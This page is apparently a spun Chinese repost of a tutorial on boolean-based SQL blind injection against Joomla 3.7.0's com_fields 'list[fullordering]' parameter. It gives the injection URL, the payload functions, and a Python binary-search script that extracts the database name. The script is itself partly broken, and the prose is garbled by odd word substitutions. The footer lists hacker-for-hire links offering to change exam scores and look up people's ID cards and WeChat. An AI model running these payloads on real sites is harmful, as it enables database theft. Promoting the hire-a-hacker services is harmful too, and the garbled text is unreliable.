浅谈SQL盲注测验办法解析与技巧
本文一切实战盲注比如,均来自Joomla! 3.7.0 – ‘com_fields’ SQL Injection。
因为篇幅有限,本文就不去分析缝隙原理,直接奉告payload刺进点,来展示盲注的用法(如有需求可自行寻觅各方大佬的研讨文章)。
注入点:
http://localhost/Joomla/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=[payload]
BooleanBase
二分法
长处:
比遍历穷举快
缺陷:
简单被封ip
速度慢
原理解析
常用函数:
left(x,y) // 从x的最左边开端截取前y位
ascii(substr((sql),1,1))=num // 从sql句子回来的字符串的之一位开端,截取字符串的一长度,将其转换成ascii编码,然后与num比较
ord(mid((sql),1,1))=num // ord()==ascii()
regexp ‘^[a-z]‘ // 在某些情况下,用正则表达式仍是很便利的!
最终只需求将手艺测验的进程转换成python用代码自动化完成
实战
直接上代码吧
# -*- coding:UTF-8 -*-
import requests
import sys
# 准备工作
url = 'http://localhost/Joomla/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]='
string = '0123456789ABCDEFGHIGHLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
flag = ''
cookies = {'9e44025326f96e2d9dc1a2aab2dbe5b1' : 'l1p92lf44gi4s7jdf5q73l0bt5'}
response = requests.get('http://localhost/Joomla/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (ascii(substr((select database()),1,1)) > 78) THEN 1 ELSE (SELECT 1 FROM DUAL UNION SELECT 2 FROM DUAL) END)',cookies=cookies,timeout=2)
print(response.text)
i = 1
while i 7:
left = 0
right = len(string) - 1
mid = int((left + right) / 2)
print('n')
print(flag)
print('Testing... ' + str(left) + ' ' + str(right))
# 特殊情况
if (right - left) == 1:
payload = "(CASE WHEN (ascii(substr((select database()),{0},1))>{1}) THEN 1 ELSE (SELECT 1 FROM DUAL UNION SELECT 2 FROM DUAL) END)".format(i, str(ord(string[left])))
poc = url + payload
print(poc)
response = requests.get(poc,cookies=cookies,timout=2)
if ('安全令牌无效') in response.text:
flag = flag + string[right]
print(flag)
exit()
else:
flag = flag + string[left]
print(flag)
exit()
# 二分法
while 1:
mid = int((left + right) / 2)
payload = "(CASE WHEN (ascii(substr((select database()),{0},1))>{1}) THEN 1 ELSE (SELECT 1 FROM DUAL UNION SELECT 2 FROM DUAL) END)".format(i, str(ord(string[mid])))
poc = url + payload
print(poc)
response = requests.get(poc,cookies=cookies,timeout=2)
# 右半部
if ('安全令牌无效') in response.text:
left = mid + 1
print('left:'+str(left))
# 左半部
else:
right = mid
print('right:'+str(right))
if (left == right):
flag = flag + string[left]
break
# 特殊情况
if (right - left) == 1:
payload = "(CASE WHEN (ascii(substr((select database()),{0},1))>{1}) THEN 1 ELSE (SELECT 1 FROM DUAL UNION SELECT 2 FROM DUAL) END)".format(i, str(ord(string[left])))
[1] [2] [3] [4] 黑客接单网
相关文章
查询身份证,找一个黑客的qq号码,找黑客改大学的姓名资料
USB/CD AutoPlay生成运用主动播放运转的木马文件;第1步:依据主机A上的路由表内容,IP确认用于拜访主机B的转发IP地址是192.168.1.2。 然后A主机在自己的本地ARP缓存中检查主...
实测一款IoT路由的安全性如何?从web到硬件,我们进行了全面的漏洞挖掘和分析(上)-
以Ewon IoT 200 Flexy路由器为例 Ewon所出产的设备已在全世界范围内被广泛运用,以下是Ewon给出的统计数据: eWON公司成立于2001年,在曩昔的十几年里,eWON已成为智能...
在线黑客接单,淄博黑客联系方式,找黑客查别人微信价格
设置好署理之后 咱们翻开burp然后在提交 如图 咱们在将抓到的包发送到intruder中 一、关于007安排的工业链 1 $at_id=(int)$at_id;-O-donots...
我在手机是网络赌博的不到两个月输了十几万,我想
https://github.com/go-gitea/gitea/releases/tag/v1.8.0-rc3近日,Spring官方团队在最新的安全更新中披露了一则SpringCloud Conf...
私人接单黑客_改高考成绩找哪些黑客
3.体系、软件缝隙· 继Facebook之后,全球网络广告商场另一巨子谷歌也清晰叫停数字钱银及ICO相关广告。 14、666666 (新呈现)私人接单黑客,改高考成绩找哪些黑客 $person = "...
黑客接单吗_暗网怎么找黑客
针对结构化的输入,AFL 供给了根据字典的办法进行处理,但是该办法的缺点在于,在变异的时分,依然处于 bit 等级的变异,AFL 无法对一个文件块进行增加和删去操作。 · 1月份被传庞氏圈套的传销币...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!